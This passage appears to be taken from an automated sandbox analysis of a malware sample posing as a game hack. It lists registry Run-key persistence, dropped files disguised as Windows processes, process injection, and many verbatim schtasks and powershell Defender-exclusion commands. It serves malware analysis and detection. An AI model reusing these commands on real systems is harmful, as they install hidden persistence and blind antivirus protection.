| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost.exe = "\"C:\\Users\\Default User\\conhost.exe.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\MSBuild = "\"C:\\Program Files\\Uninstall Information\\MSBuild.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\lsm.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "\"C:\\Windows\\security\\templates\\audiodg.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files\\Java\\jre7\\lib\\dwm.exe\"" | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskeng = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\taskeng.exe\"" | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | \??\c:\Windows\System32\CSC8AF8654FC13D48D0A5FAAA4B8D729FE.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | \??\c:\Windows\System32\3kmwe8.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1776 set thread context of 644 | N/A | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | \??\c:\Program Files\Windows Photo Viewer\en-US\CSC26E9B39D213245928B931B4D3D3897.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | C:\Program Files\Uninstall Information\fc1ee695700bed | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\wininit.exe | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\6cb0b6c459d5d3 | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Program Files\Windows Photo Viewer\42af1c969fbb7b | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\56085415360792 | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File opened for modification | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | C:\Program Files\Windows Photo Viewer\en-US\088424020bedd6 | C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | N/A |
| File created | \??\c:\Program Files\Windows Photo Viewer\en-US\conhost.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | C:\Program Files\Uninstall Information\MSBuild.exe | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Program Files\Windows Photo Viewer\audiodg.exe | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\dwm.exe | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\BitLockerDiscoveryVolumeContents\System.exe | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Windows\BitLockerDiscoveryVolumeContents\27d1bcfc3c54e0 | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Windows\de-DE\conhost.exe.exe | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Windows\de-DE\8e5032cd3c8691 | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Windows\security\templates\audiodg.exe | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Windows\security\templates\42af1c969fbb7b | C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe | N/A |
| File created | C:\Windows\Offline Web Pages\conhost.exe | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
| File created | C:\Windows\Offline Web Pages\088424020bedd6 | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe
"C:\Users\Admin\AppData\Local\Temp\GameHackBuild1.exe.bin.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\VaCm6yonii0zLXLvCqreXRVqw1.vbe"
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe"
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe"
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\chainReviewdhcp\mJEJ7PbY35CMaAu5227dvHv.vbe"
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {066F2BB1-C4A8-49BB-B79F-115FB55365A8} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\DaJttDh54LCmoatNZvevDoWyEmexKWgun1WAXP2cdZM0egnWJQQpZtVxW.bat" "
C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe
"C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor/runtimesvc.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\chainReviewdhcp\LJrjU6BhAd6hMsY1uw5hl2I0p3Jh.bat" "
C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe
"C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Photo Viewer\en-US\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-US\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Photo Viewer\en-US\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskengt" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\taskeng.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskeng" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\taskeng.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskengt" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\taskeng.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\chainReviewdhcp\containerRuntime.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\en-US\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\taskeng.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ioi08Taqru.bat"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\System.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\System.exe'" /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gxqun3yq\gxqun3yq.cmdline"
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES736B.tmp" "c:\Program Files\Windows Photo Viewer\en-US\CSC26E9B39D213245928B931B4D3D3897.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vyynnwny\vyynnwny.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7417.tmp" "c:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\CSCC87458AC71914A5D9817B7C12DDC47EA.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1gnpojgr\1gnpojgr.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7494.tmp" "c:\Windows\System32\CSC8AF8654FC13D48D0A5FAAA4B8D729FE.TMP"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "containerRuntimec" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Documents\containerRuntime.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "containerRuntime" /sc ONLOGON /tr "'C:\Users\Public\Documents\containerRuntime.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "containerRuntimec" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Documents\containerRuntime.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\explorer.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\explorer.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Windows\Offline Web Pages\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Windows\Offline Web Pages\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\Users\Default\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Users\Default\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\Users\Default\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvcr" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvc" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "runtimesvcr" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\System.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\containerRuntime.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\explorer.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\MErU4jTVhT.bat"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
C:\Program Files\Windows Photo Viewer\en-US\conhost.exe
"C:\Program Files\Windows Photo Viewer\en-US\conhost.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\System.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\System.exe"
C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe
"C:\Program Files\Windows Photo Viewer\en-US\conhost.exe.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost.exec" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\conhost.exe.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost.exe" /sc ONLOGON /tr "'C:\Users\Default User\conhost.exe.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost.exec" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\conhost.exe.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MSBuildM" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\MSBuild.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MSBuild" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\MSBuild.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "MSBuildM" /sc MINUTE /mo 9 /tr "'C:\Program Files\Uninstall Information\MSBuild.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Photo Viewer\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Photo Viewer\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 13 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\sppsvc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Favorites\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Users\Public\Favorites\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Favorites\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\winlogon.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\winlogon.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\lsm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 7 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\taskhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\taskhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\taskhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost.exec" /sc MINUTE /mo 8 /tr "'C:\Windows\de-DE\conhost.exe.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost.exe" /sc ONLOGON /tr "'C:\Windows\de-DE\conhost.exe.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost.exec" /sc MINUTE /mo 10 /tr "'C:\Windows\de-DE\conhost.exe.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 14 /tr "'C:\Windows\security\templates\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Windows\security\templates\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 6 /tr "'C:\Windows\security\templates\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 12 /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Recovery\1a287102-69f6-11ef-b2ff-62cb582c238c\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
